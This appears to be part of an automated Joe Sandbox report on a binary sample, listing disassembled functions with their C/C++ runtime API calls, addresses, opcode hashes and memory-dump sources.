                                                      Similarity
                                                      • API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmalloc
                                                      • String ID: C:\Users\
                                                      • API String ID: 1155477157-773679268
                                                      • Opcode ID: 0b3bd955bba59a611ebae51e307080de71b11039fcad9e4d2cbf3233c9c770be
                                                      • Instruction ID: d344cd2e335b4158bf136b1d10deae4a46758d3aa3e32e6732a78d4c783c3f25
                                                      • Opcode Fuzzy Hash: 0b3bd955bba59a611ebae51e307080de71b11039fcad9e4d2cbf3233c9c770be
                                                      • Instruction Fuzzy Hash: BC411672E213159FCB04AF69DC8156EB7A9EF44310BA502B9E807D7283EA70DD618B91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • memcpy.VCRUNTIME140(00000000,00000000,00000000,00000000,00000001,?,00202130,00000000,?), ref: 0020936B
                                                        • Part of subcall function 00209759: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00208010,00000001,?,?,?), ref: 0020976E
                                                      • memcpy.VCRUNTIME140(00000000,00000000,00000000,00000000,00000001,?,00202130,00000000,?), ref: 0020937A
                                                      • memcpy.VCRUNTIME140(?,00000000,00000000,00000000,00000000,00000000,00000000,00000001,?,00202130,00000000,?), ref: 00209390
                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00000000,00000001,?,00202130,00000000,?), ref: 002093E7
                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 002093ED
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4423755710.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                      • Associated: 00000000.00000002.4423737632.0000000000200000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.4423772056.000000000020C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.4423786412.0000000000212000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.4423800033.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_200000_IPrstVM17M.jbxd
                                                      Similarity
                                                      • API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmalloc
                                                      • String ID: 0! $0!
                                                      • API String ID: 1155477157-2230610793
                                                      • Opcode ID: 0b15e23fb0db83bd6bd28ea45793458cd67f76cec25212b7b12742c9235a6458
                                                      • Instruction ID: d48a5110868a574e85498dffb18032b297c54076a522955ff72b9dc65881de68
                                                      • Opcode Fuzzy Hash: 0b15e23fb0db83bd6bd28ea45793458cd67f76cec25212b7b12742c9235a6458
                                                      • Instruction Fuzzy Hash: 7941A4B2A207019FD718DF68CC8596EB7A8EB493107148769E816D72D3E770EEA1CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000,3BC7ADCC,00000000,P ,?,0020BB56,000000FF,?,002084CE), ref: 002087B5
                                                      • ??Bid@locale@std@@QAEIXZ.MSVCP140(?,0020BB56,000000FF), ref: 002087D0
                                                      • ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(?,0020BB56,000000FF), ref: 002087FB
                                                      • ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?,?,0020BB56,000000FF), ref: 0020881E
                                                      • std::_Facet_Register.LIBCPMT ref: 00208837
                                                      • ??1_Lockit@std@@QAE@XZ.MSVCP140(?,0020BB56,000000FF), ref: 00208852
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4423755710.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                      • Associated: 00000000.00000002.4423737632.0000000000200000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.4423772056.000000000020C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.4423786412.0000000000212000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.4423800033.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_200000_IPrstVM17M.jbxd
                                                      Similarity
                                                      • API ID: Lockit@std@@$??0_??1_Bid@locale@std@@Facet_Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterV42@@Vfacet@locale@2@std::_
                                                      • String ID: P
                                                      • API String ID: 3960873448-3559530664
                                                      • Opcode ID: b69ad9b3f2818144fc32804c77a42d5b4148add4dc8450477ff73a0a78c99a4f
                                                      • Instruction ID: 22322d17e1aa7510d9818c13188a80adbc607823ffe18aa97eec82e7abf95718
                                                      • Opcode Fuzzy Hash: b69ad9b3f2818144fc32804c77a42d5b4148add4dc8450477ff73a0a78c99a4f
                                                      • Instruction Fuzzy Hash: 07316971D1021ADBCB11CF58E848BAEBBB4FB04720F54825AE816A7292DB30AD54CBD0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • _set_app_type.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000001), ref: 00209B23
                                                      • _set_fmode.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001), ref: 00209B2E
                                                      • __p__commode.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001), ref: 00209B3A
                                                      • __RTC_Initialize.LIBCMT ref: 00209B52
                                                      • _configure_narrow_argv.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,0020A431), ref: 00209B67
                                                        • Part of subcall function 0020A39A: InitializeSListHead.KERNEL32(002125E0,00209B77), ref: 0020A39F
                                                      • __setusermatherr.API-MS-WIN-CRT-MATH-L1-1-0(Function_0000A248), ref: 00209B85
                                                      • _configthreadlocale.API-MS-WIN-CRT-LOCALE-L1-1-0(00000000), ref: 00209BA0
                                                      • _initialize_narrow_environment.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00209BAF
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4423755710.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                      • Associated: 00000000.00000002.4423737632.0000000000200000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.4423772056.000000000020C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.4423786412.0000000000212000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.4423800033.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_200000_IPrstVM17M.jbxd
                                                      Similarity
                                                      • API ID: Initialize$HeadList__p__commode__setusermatherr_configthreadlocale_configure_narrow_argv_initialize_narrow_environment_set_app_type_set_fmode
                                                      • String ID:
                                                      • API String ID: 1933938900-0
                                                      • Opcode ID: f2e6f82648133549e8baff1a406913627423b51566e49fcbeb860dc69067656a
                                                      • Instruction ID: 74f5c6797349568cc60ee9d090d7ec98b4750361b4c567683ae22a6bf18ba7c7
                                                      • Opcode Fuzzy Hash: f2e6f82648133549e8baff1a406913627423b51566e49fcbeb860dc69067656a
                                                      • Instruction Fuzzy Hash: 880136599703125DDB117BF5680BE5E22441F52764FC445A5BC479A0C3EE96C4B28CB3
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140(3BC7ADCC,00000000,?,00000001,00000000,0020A6A0,000000FF,?,0020268C,?,00000021), ref: 00202734
                                                      • ??1?$basic_istream@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140(?,0020268C,?,00000021), ref: 0020273D
                                                      • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140(?,0020268C,?,00000021), ref: 00202745
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4423755710.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                      • Associated: 00000000.00000002.4423737632.0000000000200000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.4423772056.000000000020C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.4423786412.0000000000212000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.4423800033.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_200000_IPrstVM17M.jbxd
                                                      Similarity
                                                      • API ID: D@std@@@std@@U?$char_traits@$??1?$basic_ios@??1?$basic_istream@??1?$basic_streambuf@
                                                      • String ID: P
                                                      • API String ID: 1860543750-3559530664
                                                      • Opcode ID: c53efe6864c54a3fd5cc84eeb7f1797cdc4c1a0cc0f9a4e3037e7d8f24dbe86c
                                                      • Instruction ID: 8a1e0cba2531ed3a15d406b90aec8b874c33e63b3060e22b512393e9b27db79a
                                                      • Opcode Fuzzy Hash: c53efe6864c54a3fd5cc84eeb7f1797cdc4c1a0cc0f9a4e3037e7d8f24dbe86c
                                                      • Instruction Fuzzy Hash: 5A213D75614246CFC716CF18D588BA9FBF5FB49708F1042ADE405873A1DB35A929CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140(3BC7ADCC,?,?,00000000,00000000,0020A6A0,000000FF,?,0020805E,?,?,?,?,?), ref: 002027F4
                                                      • ??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140(?,?,00000000,00000000,0020A6A0,000000FF,?,0020805E,?,?,?,?,?), ref: 002027FD
                                                      • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140(?,?,00000000,00000000,0020A6A0,000000FF,?,0020805E,?,?,?,?,?), ref: 00202805
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4423755710.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                      • Associated: 00000000.00000002.4423737632.0000000000200000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.4423772056.000000000020C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.4423786412.0000000000212000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.4423800033.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_200000_IPrstVM17M.jbxd
                                                      Similarity
                                                      • API ID: D@std@@@std@@U?$char_traits@$??1?$basic_ios@??1?$basic_ostream@??1?$basic_streambuf@
                                                      • String ID: P
                                                      • API String ID: 4286870943-3559530664
                                                      • Opcode ID: c099e011947c660ba4c7ecb913a419b4dcec645491ec2e737964d10e68b14661
                                                      • Instruction ID: 1ad9f248b840897afb5775c6dcfd58906695217a35a640b5e69bb479110829d4
                                                      • Opcode Fuzzy Hash: c099e011947c660ba4c7ecb913a419b4dcec645491ec2e737964d10e68b14661
                                                      • Instruction Fuzzy Hash: 712159B5608306CFCB05CF19D888B69FBF5FB49718F1041A9E40A8B3A1DB316969CF90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • __current_exception.VCRUNTIME140 ref: 00209881
                                                      • __current_exception_context.VCRUNTIME140 ref: 00209891
                                                      • terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00209898
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4423755710.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                      • Associated: 00000000.00000002.4423737632.0000000000200000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.4423772056.000000000020C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.4423786412.0000000000212000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.4423800033.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_200000_IPrstVM17M.jbxd
                                                      Similarity
                                                      • API ID: __current_exception__current_exception_contextterminate
                                                      • String ID: csm
                                                      • API String ID: 2542180945-1018135373
                                                      • Opcode ID: c24f42b788f90b09a0bfd4f7690475f633f5f2a6da94251d278b19f0f45dab9f
                                                      • Instruction ID: d6b5d7648061a53994340b5a9376c675217feed33f11a66a6ecfc22be9911773
                                                      • Opcode Fuzzy Hash: c24f42b788f90b09a0bfd4f7690475f633f5f2a6da94251d278b19f0f45dab9f
                                                      • Instruction Fuzzy Hash: 7A113975A112198FCF04DF98C480AADB7F1BF49314B148155E809AB343E734EC91CFA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • __current_exception.VCRUNTIME140 ref: 0020A2D8
                                                      • __current_exception_context.VCRUNTIME140 ref: 0020A2E2
                                                      • terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0020A2E9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4423755710.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                      • Associated: 00000000.00000002.4423737632.0000000000200000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.4423772056.000000000020C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.4423786412.0000000000212000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.4423800033.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_200000_IPrstVM17M.jbxd
                                                      Similarity
                                                      • API ID: __current_exception__current_exception_contextterminate
                                                      • String ID: csm
                                                      • API String ID: 2542180945-1018135373
                                                      • Opcode ID: 4c2b7c61f837ca528a6e4122a48878ee25e8aa18a4c9cb138a4d4c386fe13609
                                                      • Instruction ID: 508fcbcb1a1a32476924fe1c04804e9a1115ae3f37edcac9f083b9a8b5fb2777
                                                      • Opcode Fuzzy Hash: 4c2b7c61f837ca528a6e4122a48878ee25e8aa18a4c9cb138a4d4c386fe13609
                                                      • Instruction Fuzzy Hash: 79F082750203168FCB306F699004019B76CAE12721BD40627E8448B693D7B1AD71DBD3
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • memcpy.VCRUNTIME140(?,?,?,?,00000000), ref: 00207C3F
                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00207CB4
                                                      • memcpy.VCRUNTIME140(00000000,?,?,?,00000000), ref: 00207CDF
                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 00207CF8
                                                        • Part of subcall function 00209759: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00208010,00000001,?,?,?), ref: 0020976E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4423755710.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                      • Associated: 00000000.00000002.4423737632.0000000000200000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.4423772056.000000000020C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.4423786412.0000000000212000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.4423800033.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_200000_IPrstVM17M.jbxd
                                                      Similarity
                                                      • API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmalloc
                                                      • String ID:
                                                      • API String ID: 1155477157-0
                                                      • Opcode ID: 733bd51efbfa6c4768ca36ea1675e804837944077afc979edd42ea566f0028af
                                                      • Instruction ID: d2b72a8befe2b3f09d89d392e144aa186361271f83651506d129acd8ce0d20de
                                                      • Opcode Fuzzy Hash: 733bd51efbfa6c4768ca36ea1675e804837944077afc979edd42ea566f0028af
                                                      • Instruction Fuzzy Hash: 2E31E8B2E143119BD7109F74D88565AB7E4AF54360F500736EC2AC32D2E771A964C7A1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000,3BC7ADCC), ref: 00202872
                                                      • srand.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000), ref: 00202879
                                                      • rand.API-MS-WIN-CRT-UTILITY-L1-1-0 ref: 0020289F
                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(009BF490), ref: 00202975
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4423755710.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                      • Associated: 00000000.00000002.4423737632.0000000000200000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.4423772056.000000000020C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.4423786412.0000000000212000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.4423800033.0000000000213000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_200000_IPrstVM17M.jbxd
Similarity
• API ID: _invalid_parameter_noinfo_noreturn_time64randsrand
• String ID:
• API String ID: 2329022785-0
• Opcode ID: 86ff91e9e87d2cd4a9b93f878e77ce531452a53efab5a1b0d77bca1e7f0d8d09
• Instruction ID: da1052c9502e7e34493920d71e655b3372887a4f763dd3e944abd1cb198283be
• Opcode Fuzzy Hash: 86ff91e9e87d2cd4a9b93f878e77ce531452a53efab5a1b0d77bca1e7f0d8d09
• Instruction Fuzzy Hash: 2A41E871A10209DFD708CF68D898BADFBB5FF58300F248219E815977D2CB75A958CB90
Uniqueness

Uniqueness Score: -1.00%

APIs
• memcpy.VCRUNTIME140(?,?,?), ref: 00207E97
• _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00207EFF
• memcpy.VCRUNTIME140(00000000,?,?), ref: 00207F26
• Concurrency::cancel_current_task.LIBCPMT ref: 00207F45
  • Part of subcall function 00209759: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00208010,00000001,?,?,?), ref: 0020976E
Memory Dump Source
• Source File: 00000000.00000002.4423755710.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
• Associated: 00000000.00000002.4423737632.0000000000200000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4423772056.000000000020C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4423786412.0000000000212000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4423800033.0000000000213000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_200000_IPrstVM17M.jbxd
Similarity
• API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmalloc
• String ID:
• API String ID: 1155477157-0
• Opcode ID: 9130259d277ee496008a78ae5a9a7b7bfdd3a1f1a1129c72af9335ff4a0b5b60
• Instruction ID: 0f14102c7ad04828478221ac3b5d41dd082a894085b72c07b0a7279744c770bf
• Opcode Fuzzy Hash: 9130259d277ee496008a78ae5a9a7b7bfdd3a1f1a1129c72af9335ff4a0b5b60
• Instruction Fuzzy Hash: AC310872D253018BD7149F28D88476ABB99AF55310F1002AAEC15CB2D3EB71D9748791
Uniqueness

Uniqueness Score: -1.00%